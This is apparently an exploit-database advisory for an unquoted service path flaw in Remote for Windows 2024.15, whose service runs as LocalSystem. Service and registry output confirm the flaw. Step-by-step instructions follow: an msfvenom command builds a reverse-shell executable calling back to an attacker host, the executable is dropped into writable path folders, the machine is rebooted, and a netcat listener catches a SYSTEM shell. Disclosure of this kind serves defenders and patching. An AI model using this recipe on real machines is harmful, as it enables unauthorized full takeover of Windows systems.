# Exploit Title: Remote for Windows 2024.15 - Unquoted Service Path
# Date: 2025-05-23
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://rs.ltd
# Software Link: https://rs.ltd/latest.php?os=win
# Version: 2024.15
# Tested on: Windows 10/11 with Remote for Windows (helper)


Description:

The Remote4WindowsService installs with an unquoted service path and runs
as LocalSystem.


C:\>sc qc Remote4WindowsService
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: Remote4WindowsService
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\Evgeny Cherpak\Remote for
Windows\Remote4WindowsService.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Remote4WindowsService
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

C:\>


PS C:\> reg query
"HKLM\SYSTEM\CurrentControlSet\Services\Remote4WindowsService" /v ImagePath

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Remote4WindowsService
    ImagePath    REG_EXPAND_SZ    C:\Program Files\Evgeny Cherpak\Remote
for Windows\Remote4WindowsService.exe

PS C:\>

# Steps to Reproduce:

1. generate the payload

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.8.101 LPORT=8081 -f exe
> shell.exe

2. move the shell.exe to:  (if writable)
"c:\" or
"C:\Program Files\" or
"C:\Program Files\Evgeny Cherpak\" or
"C:\Program Files\Evgeny Cherpak\Remote for Windows\"



restart windows: shutdown /r /t 1

catch the shell as SYSTEM

$nc -lnvp 8081
listening on [any] 8081 ...
connect to [192.168.8.101] from (UNKNOWN) [192.168.8.105] 49672
Microsoft Windows [Version 10.0.19045.5011]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>